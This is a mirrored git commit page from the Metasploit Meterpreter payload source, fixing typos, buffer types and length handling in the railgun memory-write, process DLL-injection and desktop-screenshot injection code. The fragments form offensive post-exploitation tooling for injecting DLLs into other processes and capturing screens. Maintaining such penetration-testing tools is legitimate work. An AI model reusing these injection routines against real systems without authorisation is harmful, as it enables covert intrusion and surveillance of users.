github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-11-26 17:41:08 +01:00
Code Releases Activity

Fix buffer meta type values, typos and function calls

Browse Source
This commit is contained in:
OJ 2020-05-06 11:30:15 +10:00
parent 30f232a7fd
commit 6419fa9e40
No known key found for this signature in database
GPG Key ID: D5DC61FB93260597
5 changed files with 21 additions and 20 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
View File

@ -687,14 +687,20 @@ DWORD request_railgun_memwrite( Remote * pRemote, Packet * pPacket )
if( !lpAddress )
BREAK_WITH_ERROR( "[RAILGUN] request_railgun_memwrite: !lpAddress", ERROR_INVALID_PARAMETER );
pData = met_api->packet.get_tlv_value_raw( pPacket, TLV_TYPE_RAILGUN_MEM_DATA );
DWORD pDataLen = 0;
pData = met_api->packet.get_tlv_value_raw( pPacket, TLV_TYPE_RAILGUN_MEM_DATA, &pDataLen );
if( !pData )
BREAK_WITH_ERROR( "[RAILGUN] request_railgun_memwrite: !pData", ERROR_INVALID_PARAMETER );
// The length of the buffer specified may not match the required read size, so we still
// need to have the length specified.
dwLength = met_api->packet.get_tlv_value_uint( pPacket, TLV_TYPE_RAILGUN_MEM_LENGTH );
if( !dwLength )
BREAK_WITH_ERROR( "[RAILGUN] request_railgun_memwrite: !dwLength", ERROR_INVALID_PARAMETER );
// Let's not be silly and try to read more than the buffer allows?
dwLength = min(dwLength, pDataLen);
__try
{
memcpy( lpAddress, pData, dwLength );

8
c/meterpreter/source/extensions/stdapi/server/sys/process/ps.c
View File

@ -40,7 +40,7 @@ DWORD ps_inject( DWORD dwPid, DLL_BUFFER * pDllBuffer, char * cpCommandLine )
DWORD dwPidArch = PROCESS_ARCH_UNKNOWN;
DWORD dwDllArch = PROCESS_ARCH_UNKNOWN;
LPVOID lpDllBuffer = NULL;
DWORD dwDllLenght = 0;
DWORD dwDllLength = 0;
do
{
@ -52,12 +52,12 @@ DWORD ps_inject( DWORD dwPid, DLL_BUFFER * pDllBuffer, char * cpCommandLine )
if( dwPidArch == PROCESS_ARCH_X86 )
{
lpDllBuffer = pDllBuffer->lpPE32DllBuffer;
dwDllLenght = pDllBuffer->dwPE32DllLenght;
dwDllLength = pDllBuffer->dwPE32DllLength;
}
else if( dwPidArch == PROCESS_ARCH_X64 )
{
lpDllBuffer = pDllBuffer->lpPE64DllBuffer;
dwDllLenght = pDllBuffer->dwPE64DllLenght;
dwDllLength = pDllBuffer->dwPE64DllLength;
}
else
{
@ -71,7 +71,7 @@ DWORD ps_inject( DWORD dwPid, DLL_BUFFER * pDllBuffer, char * cpCommandLine )
if( dwDllArch != dwPidArch )
BREAK_WITH_ERROR( "[PS] ps_inject_dll. pid/dll architecture mixup", ERROR_BAD_ENVIRONMENT );
dwResult = met_api->inject.dll( dwPid, lpDllBuffer, dwDllLenght, cpCommandLine );
dwResult = met_api->inject.dll( dwPid, lpDllBuffer, dwDllLength, cpCommandLine );
} while( 0 );

4
c/meterpreter/source/extensions/stdapi/server/sys/process/ps.h
View File

@ -30,9 +30,9 @@ typedef DWORD(WINAPI * GETMODULEBASENAMEW)(HANDLE hProcess, HMODULE hModule, LPW
typedef struct _DLL_BUFFER
{
LPVOID lpPE32DllBuffer;
DWORD dwPE32DllLenght;
DWORD dwPE32DllLength;
LPVOID lpPE64DllBuffer;
DWORD dwPE64DllLenght;
DWORD dwPE64DllLength;
} DLL_BUFFER;
typedef struct _PROCESS_BASIC_INFORMATION

15
c/meterpreter/source/extensions/stdapi/server/ui/desktop.c
View File

@ -403,7 +403,7 @@ DWORD request_ui_desktop_screenshot(Remote * remote, Packet * request)
Packet * response = NULL;
THREAD * pPipeThread = NULL;
LPVOID lpDllBuffer = NULL;
DLL_BUFFER DllBuffer = { 0 };
DLL_BUFFER dllBuffer = { 0 };
char cNamedPipe[MAX_PATH] = { 0 };
char cCommandLine[MAX_PATH] = { 0 };
int quality = 0;
@ -429,13 +429,10 @@ DWORD request_ui_desktop_screenshot(Remote * remote, Packet * request)
// get the x86 and x64 screenshot dll's. we are not obliged to send both but we reduce the number of processes
// we can inject into (wow64 and x64) if we only send one type on an x64 system. If we are on an x86 system
// we dont need to send the x64 screenshot dll as there will be no x64 processes to inject it into.
DllBuffer.dwPE32DllLenght = met_api->packet.get_tlv_value_uint(request, TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_LENGTH);
DllBuffer.lpPE32DllBuffer = met_api->packet.get_tlv_value_string(request, TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_BUFFER);
dllBuffer.lpPE32DllBuffer = met_api->packet.get_tlv_value_raw(request, TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_BUFFER, &dllBuffer.dwPE32DllLength);
dllBuffer.lpPE64DllBuffer = met_api->packet.get_tlv_value_raw(request, TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER, &dllBuffer.dwPE64DllLength);
DllBuffer.dwPE64DllLenght = met_api->packet.get_tlv_value_uint(request, TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_LENGTH);
DllBuffer.lpPE64DllBuffer = met_api->packet.get_tlv_value_string(request, TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER);
if (!DllBuffer.lpPE32DllBuffer && !DllBuffer.lpPE64DllBuffer)
if (!dllBuffer.lpPE32DllBuffer && !dllBuffer.lpPE64DllBuffer)
{
BREAK_WITH_ERROR("[UI] desktop_screenshot. Invalid dll arguments, at least 1 dll must be supplied", ERROR_BAD_ARGUMENTS);
}
@ -474,7 +471,7 @@ DWORD request_ui_desktop_screenshot(Remote * remote, Packet * request)
if (dwCurrentSessionId != dwActiveSessionId)
{
dprintf("[UI] desktop_screenshot. Injecting into active session %d...\n", dwActiveSessionId);
if (session_inject(dwActiveSessionId, &DllBuffer, cCommandLine) != ERROR_SUCCESS)
if (session_inject(dwActiveSessionId, &dllBuffer, cCommandLine) != ERROR_SUCCESS)
{
BREAK_WITH_ERROR("[UI] desktop_screenshot. session_inject failed", ERROR_ACCESS_DENIED);
}
@ -482,7 +479,7 @@ DWORD request_ui_desktop_screenshot(Remote * remote, Packet * request)
else
{
dprintf("[UI] desktop_screenshot. Allready in the active session %d.\n", dwActiveSessionId);
if (ps_inject(GetCurrentProcessId(), &DllBuffer, cCommandLine) != ERROR_SUCCESS)
if (ps_inject(GetCurrentProcessId(), &dllBuffer, cCommandLine) != ERROR_SUCCESS)
{
BREAK_WITH_ERROR("[UI] desktop_screenshot. ps_inject current process failed", ERROR_ACCESS_DENIED);
}

6
c/meterpreter/source/extensions/stdapi/stdapi.h
View File

@ -181,10 +181,8 @@
#define TLV_TYPE_DESKTOP_STATION MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 3006 )
#define TLV_TYPE_DESKTOP_NAME MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 3007 )
#define TLV_TYPE_DESKTOP_SCREENSHOT_QUALITY MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 3008 )
#define TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_LENGTH MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 3009 )
#define TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_BUFFER MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 3010 )
#define TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_LENGTH MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 3011 )
#define TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 3012 )
#define TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_BUFFER MAKE_CUSTOM_TLV( TLV_META_TYPE_RAW, TLV_TYPE_EXTENSION_STDAPI, 3010 )
#define TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER MAKE_CUSTOM_TLV( TLV_META_TYPE_RAW, TLV_TYPE_EXTENSION_STDAPI, 3012 )
#define TLV_TYPE_KEYSCAN_TRACK_ACTIVE_WINDOW MAKE_CUSTOM_TLV( TLV_META_TYPE_BOOL, TLV_TYPE_EXTENSION_STDAPI, 3013 )
#define TLV_TYPE_KEYS_SEND MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 3014 )